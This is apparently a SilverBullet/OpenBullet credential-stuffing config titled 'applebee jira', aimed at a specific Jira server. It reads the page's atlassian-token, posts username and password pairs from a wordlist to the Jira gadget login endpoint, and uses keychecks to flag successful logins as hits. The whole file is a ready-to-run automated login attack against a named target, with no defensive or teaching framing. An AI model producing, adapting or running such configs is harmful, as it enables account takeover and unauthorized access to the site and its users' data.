[SETTINGS]
{
  "Name": "applebee jira",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-10-07T09:23:15.5691764-07:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "applebee jira",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "https://jira.applebee1558.com/secure/Dashboard.jspa" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<meta id=\"atlassian-token\" name=\"atlassian-token\" content=\"" "\">" -> VAR "token" 

REQUEST POST "https://jira.applebee1558.com/rest/gadget/1.0/login" 
  CONTENT "os_username=<USER>&os_password=<PASS>" 
  CONTENTTYPE "application/json" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "{\"allowCookies\":true,\"externalUserManagement\":false,\"isPublicMode\":false,\"isElevatedSecurityCheckShown\":false,\"loginSucceeded\":false,\"captchaFailure\":false,\"loginError\":false,\"communicationError\":false,\"contactAdminLink\":\"please contact your Jira administrators\",\"loginFailedByPermissions\":false}" 
  KEYCHAIN Success OR 
    KEY "<SOURCE>" DoesNotContain "{\"allowCookies\":true,\"externalUserManagement\":false,\"isPublicMode\":false,\"isElevatedSecurityCheckShown\":false,\"loginSucceeded\":false,\"captchaFailure\":false,\"loginError\":false,\"communicationError\":false,\"contactAdminLink\":\"please contact your Jira administrators\",\"loginFailedByPermissions\":false}" 

